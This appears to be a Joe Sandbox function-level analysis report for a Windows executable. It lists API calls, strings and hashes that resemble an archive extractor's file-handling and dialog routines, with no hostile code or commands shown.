Opcode ID: 0a99c80d7b5baac16e2e8c7132f5c4dcf05e7f126e9e39f2081c1096504f1632
Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
Opcode Fuzzy Hash: 0a99c80d7b5baac16e2e8c7132f5c4dcf05e7f126e9e39f2081c1096504f1632
Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871

Function 00CCE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4af2c91271b548c6d28b22eca341f12b2e7f28f1db2e6afdc5e1d6cecccb17c3
Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
Opcode Fuzzy Hash: 4af2c91271b548c6d28b22eca341f12b2e7f28f1db2e6afdc5e1d6cecccb17c3
Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871

Function 00CCE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 98b42497ba9d21dc00f767deac12fea8352952345501ad445b9177ccf130a483
Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
Opcode Fuzzy Hash: 98b42497ba9d21dc00f767deac12fea8352952345501ad445b9177ccf130a483
Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871

Function 00CCE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE51F

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bfa979e46bf353a89b8a7cb860c691796603a3829d157aa3b60677eb0d5d7c5b
Instruction ID: 50d969cfd3e6505c33d120195de878da49fb589151c048cbd2c14768bc3f4fbc
Opcode Fuzzy Hash: bfa979e46bf353a89b8a7cb860c691796603a3829d157aa3b60677eb0d5d7c5b
Instruction Fuzzy Hash: B8A001D66AA682BC3108625AAD46E3B161DC4C7F69370992EF816C44C1A8801C466871

Function 00CCE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CCE580

Part of subcall function 00CCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CCE8D0
Part of subcall function 00CCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CCE8E1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cfe51c618d0a00607b4113bcded4ead97ffca831c5841706b1efaf38ced9de99
Instruction ID: ee5febf9142093c6cff641860a994317ad7690ac67a332b6813806ca3a2063be
Opcode Fuzzy Hash: cfe51c618d0a00607b4113bcded4ead97ffca831c5841706b1efaf38ced9de99
Instruction Fuzzy Hash: ABA011C22AA0803C3008A2A3AC82E3B022CC0C2B2A330822EF800800C0A88808022830

Function 00CB9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00CB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CB9F0C

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: bdf5c8343346f8e45be7193e083623e3c4839d7da8be6bc2f30656ae49512867
Instruction ID: ee2e3d6d74d5f8deafed2bb4edd016feef608809fbde6e7d95c4a67d57e8dd42
Opcode Fuzzy Hash: bdf5c8343346f8e45be7193e083623e3c4839d7da8be6bc2f30656ae49512867
Instruction Fuzzy Hash: 00A0223008008E8BCE202B30CE0C30C3B20FB20BC030002E8A00BCF0B2CB238A0BCB20

Function 00CCAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00CCAE72,C:\Users\user\Desktop,00000000,00CF946A,00000006), ref: 00CCAC08

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b4aee65a142464a21a5bf226bda7e1d3c69505c1913c9b8b5fd50bac7b88644b
Instruction ID: 39b5ea0e63f1144aedca8946a2ac77987e9b34048fbb8e72ac15b1933450b169
Opcode Fuzzy Hash: b4aee65a142464a21a5bf226bda7e1d3c69505c1913c9b8b5fd50bac7b88644b
Instruction Fuzzy Hash: F9A011302002808B82000B328F8AB0EBAAAAFA2B00F02C038A00088030CB30C820AA00

Function 00CB9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00CB95D6,?,?,?,?,?,00CE2641,000000FF), ref: 00CB963B

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6b6f2a03b4ab1c87a6e4ed2d4a5a672041d025bde32a7d12615e5ee7cf6446ae
Instruction ID: e035c6283f5a975bc4305cb0bc14a75a7fec075d9be4d4f7a95e1478aa2e5ba3
Opcode Fuzzy Hash: 6b6f2a03b4ab1c87a6e4ed2d4a5a672041d025bde32a7d12615e5ee7cf6446ae
Instruction Fuzzy Hash: B9F0E270081B559FDB308A21C448BE2B7E8EB12321F040B1EE1F383AE0D7706B8D9A40

Non-executed Functions

Function 00CCC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CCC2B1
EndDialog.USER32(?,00000006), ref: 00CCC2C4
GetDlgItem.USER32(?,0000006C), ref: 00CCC2E0
SetFocus.USER32(00000000), ref: 00CCC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00CCC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CCC358
FindFirstFileW.KERNEL32(?,?), ref: 00CCC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CCC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00CCC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CCC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CCC3D4
_swprintf.LIBCMT ref: 00CCC404

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CCC417
FindClose.KERNEL32(00000000), ref: 00CCC41E
_swprintf.LIBCMT ref: 00CCC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00CCC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CCC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CCC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00CCC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CCC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CCC509
_swprintf.LIBCMT ref: 00CCC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CCC548
_swprintf.LIBCMT ref: 00CCC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00CCC5AF

Part of subcall function 00CCAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CCAF35
Part of subcall function 00CCAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CEE72C,?,?), ref: 00CCAF84

Strings

%s %s, xrefs: 00CCC469, 00CCC58E
%s %s %s, xrefs: 00CCC3F2, 00CCC527
REPLACEFILEDLG, xrefs: 00CCC247

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 5cf937e23f35c2f8891757febc502efcee816227730a4c10586acc6eb2bd9e75
Instruction ID: 68183404ab438be3c6355a4f5100c58f0672d898d0d03a71ea17eca2e44993d7
Opcode Fuzzy Hash: 5cf937e23f35c2f8891757febc502efcee816227730a4c10586acc6eb2bd9e75
Instruction Fuzzy Hash: 84918372148388BBE2219BA0DC89FFF77ACEB4A704F04481DF649D6181DB75A6059B72

Function 00CB6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB6FAA
_wcslen.LIBCMT ref: 00CB7013
_wcslen.LIBCMT ref: 00CB7084

Part of subcall function 00CB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CB7AAB
Part of subcall function 00CB7A9C: GetLastError.KERNEL32 ref: 00CB7AF1
Part of subcall function 00CB7A9C: CloseHandle.KERNEL32(?), ref: 00CB7B00

Part of subcall function 00CBA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641,000000FF), ref: 00CBA1F1
Part of subcall function 00CBA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641), ref: 00CBA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CB7139
CloseHandle.KERNEL32(00000000), ref: 00CB7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CB7298

Part of subcall function 00CB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CB73BC,?,?,?,00000000), ref: 00CB9DBC
Part of subcall function 00CB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CB9E70

Part of subcall function 00CB9620: CloseHandle.KERNELBASE(000000FF,?,?,00CB95D6,?,?,?,?,?,00CE2641,000000FF), ref: 00CB963B

Part of subcall function 00CBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA501
Part of subcall function 00CBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA532

Strings

\??\, xrefs: 00CB702B
SeRestorePrivilege, xrefs: 00CB6FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00CB6FCC
UNC\, xrefs: 00CB7051

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 31f93a9329980f0a47cffed1625e43e9d31f33ad04ded621744ed0502d63c337
Instruction ID: f7f09c7a6aa43b1d301823b276dcea3cddaa47295bed87c4763a1cd15adef9a6
Opcode Fuzzy Hash: 31f93a9329980f0a47cffed1625e43e9d31f33ad04ded621744ed0502d63c337
Instruction Fuzzy Hash: D2C1D571904644AADB25EB74CC85FFEB7A8AF44300F00465AFE5AE7282D734BB44DB61

Function 00CDD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00CDDA34

Strings

1#QNAN, xrefs: 00CDEC3A
1#INF, xrefs: 00CDEC41
1#SNAN, xrefs: 00CDEC33
1#IND, xrefs: 00CDEC2C

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2bbd5f50694205add21bb7477fcdecb8cd7c46b4cd67ac2ce808a09d8249a2bc
Instruction ID: e5a53b826c6fbcf9605e00579683e2ca3e5c9fc5d617841b6cfd5808087fc648
Opcode Fuzzy Hash: 2bbd5f50694205add21bb7477fcdecb8cd7c46b4cd67ac2ce808a09d8249a2bc
Instruction Fuzzy Hash: 20C22771E086288FDB25DE28DD407EAB7B5EB84305F1541EBD95EEB240E774AE818F40

Function 00CB32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB3300
_swprintf.LIBCMT ref: 00CB36C7

Strings

hc%u, xrefs: 00CB370A
h%u, xrefs: 00CB36BC
CMT, xrefs: 00CB3A17

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: a4cc80e3e02fd6644bd387a459385c22fe03ae0600cd91687f652fd09f287b86
Instruction ID: 04bd23879bab0ee370af0198a1303dbade35daf012f67b440e2eafef665f2a92
Opcode Fuzzy Hash: a4cc80e3e02fd6644bd387a459385c22fe03ae0600cd91687f652fd09f287b86
Instruction Fuzzy Hash: 5332E6715143C4AFDF14DF74C896AEA3BA5AF15300F08047DFD9A8B286DB74AA49DB20

Function 00CB286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB2874
_strlen.LIBCMT ref: 00CB2E3F

Part of subcall function 00CC02BA: __EH_prolog.LIBCMT ref: 00CC02BF

Part of subcall function 00CC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CBBAE9,00000000,?,?,?,00010410), ref: 00CC1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB2F91

Strings

CMT, xrefs: 00CB2FBC

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 507c54398c2003563e3f3574330b25e8c6f9bed057d34138ffa8a420412dd7e8
Instruction ID: f1a6c768ab8a289437a7b19c2ba2b12aa1a8659207987984fdceef0dc07d255a
Opcode Fuzzy Hash: 507c54398c2003563e3f3574330b25e8c6f9bed057d34138ffa8a420412dd7e8
Instruction Fuzzy Hash: 1A6218715002848FDF19DF78C885BEA3BA1EF54300F08457EECAA8B283DB759A45DB60

Function 00CCF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CCF844
IsDebuggerPresent.KERNEL32 ref: 00CCF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CCF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00CCF93A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 09ec5a92fb568b17a5774a406ac4c724fcb63a865bc79512890d5d5a4e90c431
Instruction ID: 4789988b4c347ddc9ac1e074ee7d8cbc175198607d8a4a0a50e1af4704e45fde
Opcode Fuzzy Hash: 09ec5a92fb568b17a5774a406ac4c724fcb63a865bc79512890d5d5a4e90c431
Instruction Fuzzy Hash: 0D311475D052599BDF21DFA4D989BCCBBF8AF08304F1041AEE40DAB290EB719B859F44

Function 00CCE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00CCE5E8,0000001C,00CCE7DD,00000000,?,?,?,?,?,?,?,00CCE5E8,00000004,00D11CEC,00CCE86D), ref: 00CCE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CCE5E8,00000004,00D11CEC,00CCE86D), ref: 00CCE6CF

Strings

D, xrefs: 00CCE6C3

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: d435096a16f5a8556b61a4f9e683fde606d58cd19a091d9f8d769b6d53f1c430
Instruction ID: 6cecdd06b527d153848bbc09b11ded317502b1eecb33a464b708510286ea1788
Opcode Fuzzy Hash: d435096a16f5a8556b61a4f9e683fde606d58cd19a091d9f8d769b6d53f1c430
Instruction Fuzzy Hash: 0801DB72A00149ABDF14DE29DC49FED7BAAEFC5324F0CC128ED69DB154D634EA068790

Function 00CD8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

